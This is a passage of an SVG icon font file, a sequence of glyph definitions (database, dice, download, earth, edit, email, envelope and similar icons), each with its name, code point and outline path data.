<glyph glyph-name="database-locked" horiz-adv-x="1000" unicode="&#xeefd;" d="M757 132c-9 0-18-7-19-17 0-7 0-15 0-23 0 0 0 0 0 0h38v1c0 7 0 13 0 20 0 11-8 19-19 19z m92 48c-23 23-53 37-87 39h-5c-36 0-68-15-91-39-24-23-38-55-38-91 0-18 3-36 10-52 7-15 16-28 28-40 23-23 55-38 91-38 72 0 130 59 130 130 0 36-15 68-38 91z m-46-146c0-5-2-6-6-6h-80c-4 0-6 1-6 6v52c0 3 2 5 6 5h4v23c0 18 14 33 31 35 19 3 36-10 40-28 0-2 0-4 0-6v-24h5c4 0 6-2 6-6l0-51z m-329 383c199 0 360 59 360 131v108c0 73-161 132-360 132s-360-59-360-132v-108c0-72 161-131 360-131z m0-251c44 0 87 3 126 9 30 53 87 89 152 89 22 0 42-4 61-11 14 14 21 29 21 45 0 0 1 175 0 178-13-68-170-122-360-122s-347 54-360 122c-1-3 0-178 0-178 0-73 161-132 360-132z m103-78c0 6 0 12 1 18-33-4-68-6-104-6-190 0-347 54-360 122v-178c0-73 161-131 360-131 72 0 139 7 195 21-55 29-92 88-92 154z" />
<glyph glyph-name="database-remove" horiz-adv-x="1000" unicode="&#xeefe;" d="M849 180c-23 23-53 37-87 38h-5c-36 0-68-14-91-38-24-23-39-55-39-91 0-19 4-36 11-52 7-15 16-29 28-40 23-23 55-38 91-38 72 0 130 58 130 130 0 36-15 68-38 91z m-32-108h-120v34h120v-34z m-343 345c199 0 360 59 360 131v108c0 73-161 132-360 132s-360-59-360-132v-108c0-72 161-131 360-131z m0-251c44 0 87 3 126 9 30 53 87 89 152 89 22 0 42-4 61-11 14 14 21 29 21 45 0 0 1 175 0 178-13-68-170-122-360-122s-347 54-360 122c-1-3 0-178 0-178 0-73 161-132 360-132z m103-78c0 6 0 12 1 18-33-4-68-6-104-6-190 0-347 54-361 122v-178c0-73 162-131 361-131 72 0 138 7 194 21-54 29-91 88-91 154z" />
<glyph glyph-name="database" horiz-adv-x="1000" unicode="&#xeeff;" d="M500 417c199 0 361 59 361 131v108c0 73-162 132-361 132s-360-59-360-132v-108c0-72 161-131 360-131z m360 59c-13-68-170-122-360-122s-347 54-360 122c-1-3 0-178 0-178 0-73 161-132 360-132s361 59 361 132c0 0 0 174-1 178z m-360-376c-190 0-347 54-360 122v-178c0-73 161-132 360-132s361 59 361 132l-1 178c-13-68-170-122-360-122z" />
<glyph glyph-name="delete" horiz-adv-x="1000" unicode="&#xef00;" d="M938 625c0 21-10 31-32 31l-541 0c-11 0-19-3-27-11-39-40-77-80-116-120-50-52-101-104-151-156-11-12-11-27 0-39 46-47 91-93 137-141 43-44 86-89 130-134 7-7 15-11 26-11l544 0c20 0 30 10 30 30v276c0 92 0 183 0 275z m-54-528c-3 0-5-1-8-1-166 0-331 0-497 1-4 0-10 2-14 6-68 70-137 141-205 212-12 11-23 23-34 35 2 2 3 4 5 5 78 81 155 161 233 241 5 5 10 8 18 8 163-1 327 0 490 0h12l0-507z m-145 410c-34-35-69-70-104-106-4-5-12-5-16 0-35 35-70 70-104 106-5 4-12 4-17-1-8-8-16-17-25-26-4-4-4-12 0-16 34-35 69-70 104-106 4-4 4-12 0-16-35-36-70-71-104-106-5-5-5-12 0-17 8-8 17-17 25-26 5-4 12-4 17 0l104 106c4 4 12 4 16 0 35-35 69-70 104-106 4-4 12-4 16 0 9 9 17 18 26 26 4 5 4 12 0 17-34 35-69 70-104 105-4 5-4 13 0 17 35 36 70 71 104 106 5 5 4 12 0 17l-26 26c-4 4-11 4-16 0z" />
<glyph glyph-name="diamond" horiz-adv-x="1000" unicode="&#xef01;" d="M349 412c49-131 98-260 147-392 2-5 6-5 8 0 49 132 98 262 147 392 2 5-1 9-6 9h-290c-5 0-8-4-6-9z m-279 2c132-137 263-272 395-408 4-4 7-7 8-6 0 0-1 5-3 10l-152 402c-2 5-8 9-14 9h-231c-6 0-7-3-3-7z m611-4c-43-114-86-228-129-343-7-19-14-38-22-58-2-5-3-10-3-10 1 0 4 3 8 7 132 136 263 271 396 408 4 4 4 8 0 8h-7c-75 0-151-1-226 0-10 0-14-4-17-12z m-38 50c-46 69-91 137-137 206-3 5-9 5-12 0-46-69-91-138-137-206-3-5-1-9 5-9h276c6 0 8 4 5 9z m-434 218c-49-74-97-146-145-219-3-4-1-8 5-8h224c6 0 9 4 7 9-27 73-54 144-82 216-2 6-6 6-9 2z m727-219c-49 74-96 145-145 219-3 4-7 4-9-2-28-72-55-144-82-216-2-5 1-9 7-9h224c6 0 8 4 5 8z m-186 241h-222c-6 0-8-3-5-8 48-73 95-144 143-216 4-5 8-5 10 1 27 72 54 143 80 214 2 5-1 9-6 9z m-278 0h-222c-5 0-8-4-6-9 26-71 53-142 80-214 2-6 6-6 10-1 48 72 95 143 143 216 3 4 1 8-5 8z" />
<glyph glyph-name="dice-multiple" horiz-adv-x="1000" unicode="&#xef02;" d="M476 432c0 96-2 193 0 289 1 31-9 53-35 67h-325c-20-15-34-32-34-60 1-99 0-198 1-297 0-37 18-55 53-55 95 0 191 0 286 0 36 0 54 18 54 56z m-95 297c22 1 39-17 39-40 1-23-15-40-37-40-21 0-38 17-39 39 0 21 17 40 37 41z m-167-258c0-21-18-38-39-38-20 1-37 19-37 41 0 21 20 40 41 40 19-1 36-21 35-43z m-37 178c-21 0-39 17-39 38-1 22 17 42 39 42 20 0 37-18 37-40 1-22-16-40-37-40z m102-108c-20 0-38 19-38 39-1 22 19 42 40 41 20 0 36-18 36-41 0-22-16-39-38-39z m141-71c0-21-18-37-39-37-20 1-37 20-37 42 1 20 20 39 40 39 20-1 37-21 36-44z m478-246c-68 71-135 141-203 212-22 23-50 24-73 0-69-72-138-145-207-218-9-10-14-21-13-39-2-12 6-24 16-35l112-117c30-31 60-63 91-95 26-27 51-26 77 1 67 70 133 139 200 208 26 27 26 56 0 83z m-384-81c-22 0-39 18-39 43 1 20 18 38 38 38 21 0 39-18 39-41 0-21-17-40-38-40z m145 0c-22 0-39 19-38 42 0 22 17 39 38 39 22 0 38-17 39-40 0-23-17-41-39-41z m-38 195c0 21 18 38 39 38 22 0 38-18 38-42-1-21-19-39-39-39-21 1-39 21-38 43z m77-308c-1-22-18-39-39-39-22 0-38 18-38 41 0 21 20 40 40 39 21-1 37-20 37-41z m108 113c-22 0-40 18-39 41 0 22 17 40 37 40 22 0 39-18 39-41 0-22-16-40-37-40z" />
<glyph glyph-name="dice" horiz-adv-x="1000" unicode="&#xef03;" d="M868 626c-175 53-349 105-523 157-58 17-108-17-121-65-25-88-52-175-78-263s-53-174-79-262c-16-54 11-103 65-119 175-52 350-105 525-157 54-16 103 11 119 65 53 175 105 349 157 524 16 54-11 104-65 120z m-521-463c-14-48-66-76-115-61-49 15-76 66-61 116 14 47 66 75 115 61 48-14 76-66 61-116z m64 213c-15-48-66-76-115-62-49 15-76 67-61 116 14 49 65 76 115 61 49-15 76-66 61-115z m63 212c-14-48-65-75-114-61-49 15-77 66-62 116 15 48 66 76 115 61 49-15 76-66 61-116z m228-530c-15-49-65-77-115-62-49 15-76 65-62 114 15 50 67 78 116 63 48-15 76-66 61-115z m64 213c-15-49-66-77-115-63-49 15-77 66-62 116 15 49 66 76 114 61 50-15 77-65 63-114z m63 213c-14-50-65-77-114-63-49 15-77 66-63 115 15 49 66 77 115 62 49-14 77-65 62-114z" />
<glyph glyph-name="disc" horiz-adv-x="1000" unicode="&#xef04;" d="M500 457c-59 0-107-48-107-107s48-107 107-107c59 0 107 48 107 107s-48 107-107 107z m0-162c-30 0-55 25-55 55 0 30 25 55 55 55 30 0 55-25 55-55 0-30-25-55-55-55z m315 358c-25 26-53 49-83 68-67 42-147 67-232 67-242 0-437-196-437-438s195-438 437-438 438 196 438 438c0 118-47 225-123 303z m-315-454c-83 0-151 68-151 151s68 151 151 151 151-68 151-151-68-151-151-151z" />
<glyph glyph-name="diskette" horiz-adv-x="1000" unicode="&#xef05;" d="M930 629c-50 51-101 102-151 152-3 3-5 6-8 6-8 0-16 0-24 0-9 0-17-7-17-16v-268c0-9-7-16-16-16h-428c-9 0-17 7-17 16v268c0 9-2 16-5 16-2 0-4 0-6 0-45 0-90 1-135 0-36 0-58-22-58-58 0-253 0-505 0-758 0-36 22-58 58-59 251 0 503 0 754 0 36 0 58 23 58 58 1 215 1 430 0 645 0 5-2 11-5 14z m-104-634h-652v382h653v-382z m-166 723h-75c-9 0-16-8-16-17v-157c0-9 7-16 16-16h75c9 0 16 7 16 16v157c0 9-7 17-16 17z m96-396h-511c-9 0-17-8-17-17v-20c0-9 8-16 17-16h511c9 0 16 7 16 16v20c0 9-8 17-16 17z m0-108h-511c-9 0-17-7-17-16v-21c0-9 8-16 17-16h511c9 0 16 7 16 16v21c0 9-8 16-16 16z m-511-164h511c9 0 16 8 16 17v20c0 9-7 16-16 16h-511c-9 0-16-7-16-16v-20c0-10 7-17 16-17z" />
<glyph glyph-name="document-folder" horiz-adv-x="1000" unicode="&#xef06;" d="M740 320v33h159v61c0 27-21 49-47 49h-112v119c0 16-8 37-18 49-13 15-25 31-38 46-10 12-20 23-31 35-9 12-30 21-45 21h-321c-15 0-27-12-27-28v-174h-112c-27 0-48-22-48-49v-129h160v-33h-197l37-308c0-25 21-46 48-46h704c26 0 47 21 47 46l39 308h-198v0z m-451 33v314c0 13 11 24 25 24h281c13 0 31-8 40-18 8-11 17-21 26-32 12-13 23-26 34-40 9-10 16-29 16-43v-238h-422v33z m359 193h-301c-6 0-11-4-11-10v-11c0-5 5-10 11-10h301c6 0 11 5 11 10v11c0 6-5 10-11 10z m0-68h-301c-6 0-11-4-11-10v-11c0-5 5-10 11-10h301c6 0 11 5 11 10v11c0 6-5 10-11 10z m0-74h-301c-6 0-11-5-11-10v-11c0-6 5-10 11-10h301c6 0 11 4 11 10v11c0 5-5 10-11 10z" />
<glyph glyph-name="download-alt" horiz-adv-x="1000" unicode="&#xef07;" d="M635 109c-9-9-25-9-35 0l-295 287c-9 9-9 24 0 34l59 57c10 9 25 9 35 0l150-146v375c0 14 11 24 24 24h99c14 0 25-10 25-24v-365l140 136c9 9 25 9 35 0l58-57c10-10 10-25 0-34l-295-287z m-572 51v-201h874v201h-188l-112-109c-10-11-28-11-38 0l-113 109h-423z m201-101c0 20 16 36 37 36s37-16 37-36-17-36-37-36-37 16-37 36z m-132 0c0 20 16 36 37 36 20 0 37-16 37-36s-17-36-37-36c-21 0-37 16-37 36z" />
<glyph glyph-name="download" horiz-adv-x="1000" unicode="&#xef08;" d="M483 131c9-10 25-10 35 0l294 285c9 10 9 25 0 34l-59 57c-9 10-25 10-35 0l-139-135v364c0 13-11 24-25 24h-98c-14 0-25-11-25-24v-374l-149 145c-10 10-25 10-35 0l-59-57c-9-9-9-24 0-34l295-285z m333 137v-206h-632v206h-121v-267c0-34 27-61 60-61h754c33 0 60 27 60 61v267h-121z" />
<glyph glyph-name="downloaded" horiz-adv-x="1000" unicode="&#xef09;" d="M861 405c-20 17-28 34-32 60-12 89-63 151-145 183-86 32-170 23-242-38-15-14-30-21-48-23-34 42-86 69-144 69-104 0-187-84-187-187 0-46 16-87 43-120-31-52-37-113-16-174 30-87 107-141 204-141 71 0 143 0 214 0 73 0 146 0 219 0 90 1 168 55 198 139 30 83 6 175-64 232z m-776 64c0 91 74 164 165 164 51 0 97-23 127-60 7-9 13-18 19-29 7-15 13-32 16-49 1-9 2-17 2-26 0-91-74-164-164-164-29 0-57 7-80 20-10 6-19 12-28 20-7 6-13 12-19 19-23 28-38 65-38 105z m814-279c-23-76-91-126-173-126-72 0-143 0-215 0-73 0-146 0-219 0-84 0-153 50-176 127-15 48-10 95 12 136 9-8 20-15 31-22-15-28-18-61-9-96 17-66 71-107 145-107 140 0 281 0 422 0 76 0 133 41 149 108 17 66-14 129-81 165-9 6-19 20-19 30 2 89-38 156-111 182-82 28-155 2-209-76-3-4-6-8-11-13l-1 0c-3 20-9 39-18 57 11 2 20 8 31 19 64 65 144 77 226 46 79-31 125-92 129-179 0-23 9-36 27-49 67-46 94-126 70-202z m-696 176c2-2 6-2 8 0 48 44 95 88 143 132 2 2 2 6 0 8-9 11-19 22-28 33-2 2-6 2-8 0-34-33-68-65-102-97-2-2-6-2-8 0-12 13-24 25-36 38-2 2-6 2-8 0-10-9-21-18-32-28-2-2-2-5 0-7 24-27 47-53 71-79z" />
<glyph glyph-name="drag" horiz-adv-x="1000" unicode="&#xef0a;" d="M954 359l-176 176c-5 6-15 6-20 0l-35-35c-6-6-6-15 0-21l83-83h-217c-10 22-28 39-50 49v196l89-89c6-6 15-6 21 0l35 35c5 6 5 15 0 21l-176 175c-6 6-15 6-21 0l-175-176c-6-5-6-15 0-20l35-35c5-6 15-6 20 0l83 83v-193c-19-10-34-26-44-46h-212l83 83c6 6 6 15 0 21l-34 35c-6 6-15 6-21 0l-176-176c-6-6-6-15 0-21l176-175c6-6 15-6 21 0l35 35c5 6 5 15 0 21l-90 89h219c10-19 25-35 44-45v-198l-84 83c-5 6-15 6-20 0l-35-35c-6-5-6-15 0-20l175-176c6-6 15-6 21 0l176 176c6 5 6 15 0 20l-35 35c-6 6-15 6-21 0l-89-89v201c21 10 39 27 49 48h224l-89-89c-6-6-6-16 0-21l35-35c6-6 15-6 21 0l175 175c6 6 6 15 0 21z" />
<glyph glyph-name="drag1" horiz-adv-x="1000" unicode="&#xef0b;" d="M930 370l-141 141c-11 10-19 7-19-8v-145h-162c-3 54-46 97-101 101v160h146c14 0 18 9 7 19l-141 142c-10 10-27 10-38 0l-141-142c-11-10-7-19 8-19h145v-160c-54-4-98-47-101-101h-162v145c0 15-8 18-19 8l-141-141c-11-11-11-28 0-38l141-142c11-10 19-7 19 8v145h162c3-54 46-97 101-101v-161h-146c-14 0-18-9-7-19l141-142c10-10 27-10 38 0l141 142c11 10 7 19-8 19h-145v161c55 4 98 47 101 101h162v-145c0-15 8-18 19-8l141 141c11 11 11 28 0 39z" />
<glyph glyph-name="drag2" horiz-adv-x="1000" unicode="&#xef0c;" d="M382 581l105 105c5 5 13 5 18 0l105-105c5-5 14-5 18 0l31 31c5 5 5 13 0 18l-154 154c-5 5-13 5-18 0l-154-155c-5-5-5-13 0-18l31-30c5-5 13-5 18 0z m552-224l-155 154c-5 5-13 5-18 0l-31-31c-5-5-5-13 0-18l106-105c5-5 5-13 0-18l-105-106c-5-5-5-13 0-18l31-30c5-5 13-5 18 0l154 154c5 5 5 13 0 18z m-770-14c-5 5-5 13 0 18l105 106c5 5 5 13 0 18l-31 31c-5 5-13 5-18 0l-154-155c-5-5-5-13 0-18l155-154c5-5 13-5 18 0l31 31c5 5 5 13 0 18l-106 105z m472-223c-5 5-13 5-18 0l-105-106c-5-5-13-5-18 0l-105 105c-5 5-14 5-19 0l-30-31c-5-5-5-13 0-18l154-154c5-5 14-5 18 0l154 155c5 5 5 13 0 18l-31 31z" />
<glyph glyph-name="drag3" horiz-adv-x="1000" unicode="&#xef0d;" d="M761 521l-12-13 155-151h-307c-2 24-12 45-28 62-17 16-39 26-62 27v308l151-155 13 12-171 177-171-177 13-12 151 155v-308c-47-4-84-42-87-88h-310l155 150-12 13-176-171 176-171 12 13-155 151h310c3-47 40-84 87-88v-309l-151 155-13-12 169-175 2-2 171 177-13 12-151-155v308c24 2 45 11 62 28 16 16 26 38 28 61h307l-155-151 12-13 177 171-177 171z m-260-251c-44 0-80 36-80 80 0 20 8 40 22 55 14 14 32 23 52 25h12c42-3 74-38 74-80 0-44-35-80-80-80z" />
<glyph glyph-name="earth" horiz-adv-x="1000" unicode="&#xef0e;" d="M492 575l1-2 2 0h2c4 11-6 11-14 13l-4-1 1-3 12-7z m98-15l2 0c4 2 9-3 11 4-6 0-9 1-14 0 0 0 0-4 1-4z m-37 4l6 0c-1 5-13 8-13 1-2-1 4-1 7-1z m-121 97c-4-5-4 3-7 1l-2-1c-5-7-19-8-17-20 12 1 19 10 26 20z m42-63c-9 4-9-5-10-12l3-3c7 1 11 10 7 15z m-37 68c0-1-1-3-2-5 1 1 4 0 4-2l-11-8c2 0 4 0 2-2l-7-3h7c-1-3-4-3-6-4-3-1-5-2-4-6 2 1 4 2 7 3 7 2 15 1 22 5l-4 2c4 1 7 3 5 8l-3-2c3 7-3 16 3 20l2 3c-2 0-5 0-7 0l5 3c-8 0-12-8-18-12 1-3 5 2 5 0z m-4-7c1 1 1 1 2 2-1 0-1-1-2-2z m397-200l-4 1-1-2-1-6 1-2 0 0 2 1 2 1 1-2 2-5 3-6 1 0-1 9h0l1 0 1 0 0 2-1 5-4 11-1 1 0-3 0-3 0-2h-1z m-2-61l3-1 3 1 1 3 1 4-1 1c-3-1-7-2-10-3l-3-3 0-5v-6l-1-6-2-6 0-5 1-5 1-5-1-6 1-4 2 0 1 5-1 11 1 3 2-3 0-5 2-2 3 3 0 6-3 7 0 2 1 2 3 6-1 3-2-2-2-3-2 2-1 5 2 5 2 1z m5-56l-2 0-6-3-4 1-2-2 0-4 1-2 6 2 7 6 0 2z m-12 5l-8 0-3 0-3-3 3-4 6-1 2 1 3 5c0 0 0 1 0 2z m20 72l-1 3 0-1 0-4v-5l0-8 0-5 0-4 1-1 0 1 0 2 0 2 0 4 1 2 1 2 0 3-1 5-1 4z m-6-82l-4-5-2-3-1-5 1-3 2 1 4 7 8 10h-4l-4-2z m20 54l-1-1 0-4-1-6-1-2 0 2-1 5 1 7h0l-1 4-1 2-1 0-1-1-2 0-1 0 0-3 0-2 1-5 0 0 0-1 1 0 0 0 0-1 0-1 1-1 2 0 0 0 0-2-1-1 0 0-1-1v-3l0-1v-1l0-3v-2l1 0 0 1 0 3 1 1 0 1 0 0 1-1 0-1 0-3v-1l1 0 1-2 0 0 0 0v-1l0 0h0v-1l0-1-1-7 0-4 0-3 0-1 0-1v0l0-1-1-1 0 0-1-2 0-4 0-2 0 0 1 2 0 1 0 0v-1l-1-4 0-2 0 0 0 0c3 17 5 33 6 50l-1 7z m-46 109l2-7 0-6 2-3 1-3 1 1 0 6 0 2 3 0 3-2 1 3-2 5-3 0-4 3-2 7-2 9-3 6-3 4-2 1 0-2 1-3 1-3 1-6 1-6 4-6z m11-19l-1-1v-1l1-5 1-1 1 1 1 0 0 1 0 2-1 1-1 3-1 0z m5 0l2-10 1-2 1 1-1 3 0 2-1 3 0 2 0 1 0 2-2 2-1 1h-1l0-2 1-2 1-1z m-17-112l4 3 1 7v5l1 3 1 4 1 3 1 6 2 4 1 4-1 3-3 6-2 3 1 7 2 5-1 5-8 7-3-3-1-10 0-1c2-20 2-40 2-60l2-1z m-75-109l-3 6-6 1-4-3-2-4-15-20-17-9-3-3-2-3-1-4 1-22-8-20 0-4-1-7 1-3 6-7 9-2 10 7 5 16 21 43 6 27 1 3 1 3 1 0 0 5 0-1 0 1z m-184 442h5-5z m-49 86c-242 0-437-196-437-438s195-438 437-438 438 196 438 438-196 438-438 438z m0-798c-76 0-147 24-205 65 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0-1 1-1 1-1 1-2 1-3 2 0 0-1 0-2 1 0 0-1 0-2 1-19 14-37 29-53 47 0 0 0 0-1 1 0 1-1 2-2 2l0 0-6 7c1 0 1 1 1 2-1 1-2 3-3 5 1 0 5 0 6 4 2 10-3 17-7 25 2 0 4-1 6-3 3 5 4 10 5 16 0 2 1 5 1 8-1 15-13 29-10 43 6 20 17 39 21 60 0 2 2 4 3 6 2 4 4 8 4 13 1 2 2 7 1 10 0 3-1 7-1 8-1 1-2 3-2 4-1 1-6 5-11 8-5 4-10 6-10 6s0 1 0 1 0 0 0 0c0 1-1 1-1 2 0 0 0 0-1 0h0c0 0-1 0-1 1 0 0-1 0-1 0 0 0-1 0-1 1-1 0-2 0-2 0-1 1-1 1-1 1 0 0-1 0-1 0h-6c-3 0-5 0-6 0 0-1 0-1 0-2 0-1-1-2-1-2 0 0-1 0-1 0 0 0-1 0-1 0 2 9-5 19-14 16v-5c-7 1 2 8-4 10-7 2-3-7-9-9 7 16 6 29-3 43-6 12-20 17-20 33-1 2-2 4-2 4-1 0-2 0-3-1-1-1-2-2-2-2 0 0 0 1 0 1 0 1 0 3 0 6 0 0 0 1 0 1 37 160 180 279 351 279 19 0 37-2 55-5-3 0-6-1-9-3-1 0-3-1-4-1-1-1-2-1-3-1 3-1 6 1 8 2-1 0-1 0-2 0l1 0h1l1 0 0 0c2 1 4 1 7 2 1 0 3-1 5-1-2 0-3-1-4-2-3-1-5-2-8-4h5l-3-3h1c-5-2-8-2-13-2l10 3c-15 0-29-3-44-7-3-1-5-2-7-3-3-1-5-2-8-4-6-3-16-8-13-11 4-4 7-5 11-6 1-1 3-1 5-3 1-2 3-3 5-5 10-2 19 10 10 19 3 1 5 4 7 6 2 3 5 5 8 6-5-2-5-9-3-11 3-2 7-1 11 1 4 2 9 4 13 3-1-2-4-2-6-3-3-1-5-2-8-2-5 0-7-7-3-11-2 2-5 2-7 2-2-17-22-19-34-12 2 0 5-2 7 2 0 3-2 3-5 1v6c-7 1-7-7-7-12l-7 1c-14-10-27-15-42-20-3-1-6-3-9-4 8-3 8-18 0-17-22 7-48 12-52-15 0-4-5-9-1-12 13-10 32-10 48-4 5 2 8 11 14 12 3 1 6 3 8 4 2 2 4 4 6 7 3 2 6 4 9 4 4 1 8 1 12 2 2 0 5 0 8 1 11-11 30-24 37-39 1 5 6 12 13 5-7 12-32 23-34 40 17-12 34-20 46-41 2-1 7-3 11-1 5 3 3 6 2 8-2 3-4 5-1 9 2 3 3 2 5 0 11-24 43-12 55-23 17-13-10-30-31-27-12 3-22 5-31 9-3 0-5 1-7 1-2 1-5 0-6 0-2-1-3-3-4-4s-1-4-1-5-1-2-2-3c-1-1-4 0-7 1s-6 3-7 3c0 0-4 2-7 4-2 1-4 2-6 2-12 1-26 9-19 23-11 4-23 5-35 4-3-1-6-1-9-2-16-5-31-5-48-5-12 0-21-14-26-25-2-2-3-4-5-6-5-6-13-12-20-15-4-2-7-4-9-6-22-16-29-44-36-71 0-1-1-3-1-3-1-1-1-4-1-5 1-2 0-5 0-7 0-2 0-4-1-5 0-1 1-2 1-3s2-1 2-1c3-2 5-5 6-7 2-3 3-6 5-9 13-44 62-41 97-27l9 2c2 0 5 1 7 2 6-1 12-2 12-3 0-1 0-2 1-2 0-1 1-1 1-2 0 0 1-1 1-1 0-1 1-1 1-2 0 0 1-1 2-2 1-1 5-1 10-1 7 0 10-3 13-8 7-16-5-33 10-44 1-1 2-3 4-5 2-3 4-6 6-9 4-7 8-16 8-22s3-10 4-12c1-2 1-6 0-9 0-2-1-4-1-6-8-11-13-25-12-37 7-20 21-39 25-60v-3c1-1 2-3 2-4 1-1 2-2 2-2 1 0 1-1 1-1 1 0 1-1 1-1 0 0 1-2 3-4 1-2 3-6 4-7 2-2 3-6 4-8 1-2 1-5 0-5s0-2 0-2c-1-1 0-2 0-3 0-1 1-3 3-4 1-2 3-3 3-4 1 0 4-1 6-1 3 0 5 0 6 0 1 0 3 1 3 2 1 0 2 2 3 2 0 1 9 2 18 2l28 14c4 5 9 10 10 12 0 2 4 5 6 7 3 2 6 6 7 10 0 3 2 6 3 8 4 5 12 5 12 10 4 18 11 34 23 50 2 3 3 5 5 8 9 16 14 34 13 53-1 2-1 4-2 6-10 36 20 59 54 74 1 2 2 4 3 6 3 8 6 15 8 23 1 2 2 5 3 7 5 5 3 12 3 17-10-5-21-3-30-5-3 0-5-1-7-1-2 1-4 1-4 2-1 0-6 3-11 5-5 2-6 5-9 7-2 1-5 8-7 10-2 1-5 6-6 7-6 9-12 16-17 26-7 11-15 21-21 33-2 2-3 4-5 7-2 2-4 4-5 6-5 4-6 6-9 9-2 1-1 3 1 3 10 6 7-10 15-9 2-2 4-4 6-6 2-2 4-4 6-6 2-3 4-5 7-8 9-12 17-24 26-35 1-2 3-4 4-6s3-5 4-8c6-31 40-15 59-9 10 5 22 11 23 23 6 23-13 37-29 51-1-14-17-14-22-4-1 2-2 4-3 6l-2-6c-3 9-10 18-15 24 8 0 15-5 24-9l9-4c17-7 34-14 55-12 5 1 7-3 9-8 0-2 1-5 1-8 1-3 1-6 1-8 2 2 3 5 5 8 1 3 3 6 4 9 6 17 5 37 0 55 42-59 67-131 67-209 0-199-161-360-360-360z m51 714c-1-1-2-1-3-1 1 0 2 1 3 1z m-4-2h1-1z" />
<glyph glyph-name="ebook" horiz-adv-x="1000" unicode="&#xef0f;" d="M794 788h-588c-19 0-34-16-34-36v-804c0-20 15-35 34-35h588c19 0 34 15 34 35v804c0 20-15 36-34 36z m-295-856c-11 0-19 8-19 19s8 20 19 20 19-9 19-20-8-19-19-19z m262 55h-527v726h296v-221c0-4 2-5 5-2l79 81c3 3 7 3 10 0l79-81c3-3 5-2 5 2v221h53l0-726z m-57 393h-408c-3 0-5-3-5-6v-33c0-3 2-5 5-5h408c3 0 5 2 5 5v33c0 3-2 6-5 6z m0-83h-408c-3 0-5-2-5-5v-33c0-4 2-6 5-6h408c3 0 5 2 5 6v33c0 3-2 5-5 5z m0-85h-408c-3 0-5-3-5-6v-33c0-3 2-5 5-5h408c3 0 5 2 5 5v33c0 3-2 6-5 6z m0-83h-408c-3 0-5-2-5-5v-33c0-3 2-6 5-6h408c3 0 5 3 5 6v33c0 3-2 5-5 5z" />
<glyph glyph-name="edit" horiz-adv-x="1000" unicode="&#xef10;" d="M934 468c-1-1-2-2-3-2-44-45-88-89-132-134-4-4-6-11-6-17-1-81-1-161-1-241v-8c0-4-6-7-14-7h-554c-8 0-15 6-15 14v555c0 8 4 14 8 14h8c80 0 159 0 239 1 7 0 16 3 21 8 43 42 84 84 126 126 2 2 3 3 5 5 2 3-2 5-10 5h-529c-8 0-14-6-14-14v-846c0-8 6-14 14-14h846c8 0 15 6 15 14v529c0 8-2 14-4 12z m-597-105v-162c0-8 7-14 15-14h161c8 0 19 4 24 10 129 129 259 259 388 388 6 6 6 15 0 20l-169 170c-6 6-15 6-21 0-129-129-259-259-388-388-5-5-10-16-10-24z" />
<glyph glyph-name="eject" horiz-adv-x="1000" unicode="&#xef11;" d="M848 788h-696c-49 0-89-41-89-90v-696c0-49 40-90 89-90h696c49 0 90 41 90 90v696c0 49-41 90-90 90z m-144-642h-408v68h408v-68z m-403 145l202 263 201-263h-403z" />
<glyph glyph-name="email" horiz-adv-x="1000" unicode="&#xef12;" d="M520 496c-6-1-11-3-16-6-5-3-9-7-12-13s-5-10-6-17c-1-6-2-13-1-20 1-8 3-14 8-18 4-3 9-5 15-4 4 0 7 1 10 1s6 2 9 4l6 73c-3 0-5 0-7 0-1 0-3 0-6 0z m-451 62c139-139 278-277 416-416 12-12 17-11 29 0l393 394c10 9 23 17 28 29 5 12 1 27 1 41 1 28-13 41-41 41h-792c-27 0-40-14-40-40 0-11 0-22 0-33-1-7 2-11 6-16z m318-81c5 19 13 35 24 51 12 15 27 28 46 39 20 11 43 18 70 21 15 1 29 0 42-2 14-3 26-8 36-15 11-7 19-17 26-28 7-12 11-26 13-43 1-12 0-24-2-36-3-12-8-23-14-33-6-10-14-18-24-25-9-7-20-11-33-12-14-2-25 1-33 8-5-4-11-7-17-10-7-3-14-4-24-5-6-1-12-1-18 1-5 1-10 3-15 7-4 4-8 8-11 14-3 6-5 13-6 21-1 13 0 25 4 37 3 11 8 21 15 30 6 8 15 15 24 21 10 5 20 8 31 10 9 0 18 1 26 0 9 0 17-2 24-4l-9-100c2-1 6-1 10-1 7 1 13 3 19 8 5 5 9 11 12 18 3 7 5 15 6 23 2 9 2 17 1 25-2 22-11 38-25 49-15 10-34 14-59 12-19-2-35-7-50-14-14-8-25-18-34-30s-16-25-20-40c-4-15-5-30-4-45 1-14 5-25 10-35 5-9 11-17 19-22 8-6 17-10 26-12 10-2 21-2 31-1 10 1 20 2 28 4 8 2 16 5 23 9 2-5 4-9 6-13 2-5 4-9 5-13-3-2-7-4-12-6-5-2-10-4-15-5-6-2-12-3-18-4-6-1-12-2-18-2-15-2-30-1-43 2-14 3-26 8-37 16-11 8-20 18-27 31-7 13-12 28-13 47-2 17 0 34 4 52z m352-186c-2 2-5 4-9 8-2-3-4-6-6-8-60-60-120-120-180-180-28-28-61-28-88-1-60 60-120 120-180 180-3 3-5 6-7 9-3-2-4-3-5-4-65-65-131-131-196-196-6-6-6-12-4-19 4-18 18-27 38-27h794c3 0 6 0 8 0 13 2 23 8 29 20 5 12 6 18-5 30-63 62-126 125-189 188z m-676-133l170 170c-56 58-113 115-170 172v-342z m873 1v341l-170-170 170-171z" />
<glyph glyph-name="envelope-open" horiz-adv-x="1000" unicode="&#xef13;" d="M523 181c-13-9-33-9-45 0l-393 280c-12 8-22 3-22-12v-448c0-16 12-28 27-28h820c15 0 28 12 28 28v448c0 15-11 20-23 12l-392-280z m-38 49c5-3 10-5 15-5s11 2 15 5l330 235c6 5 11 13 11 21v215c0 15-12 26-26 26h-660c-14 0-25-11-25-26v-215c0-9 4-17 10-21l330-235z m-186 391h386c16 0 28-13 28-28 0-16-12-28-28-28h-386c-16 0-28 12-28 28 0 15 12 28 28 28z m0-98h386c16 0 28-13 28-28s-12-28-28-28h-386c-16 0-28 12-28 28 0 15 12 28 28 28z" />
<glyph glyph-name="envelope" horiz-adv-x="1000" unicode="&#xef14;" d="M493 268c-118 58-337 166-408 200-12 6-22-1-22-14v-396c0-14 11-25 25-25h824c14 0 25 11 25 24v396c0 14-10 20-22 14-70-34-287-141-403-199-7-3-12-3-19 0z m-314 230c105-52 210-103 315-154 4-2 11-3 15-1 140 69 281 139 422 208 5 2 7 5 7 11-1 21 0 57 0 81 0 14-11 25-25 25h-826c-13 0-24-11-24-25 0-24 0-61 0-82 0-3 4-8 7-10 36-18 72-35 109-53z" />
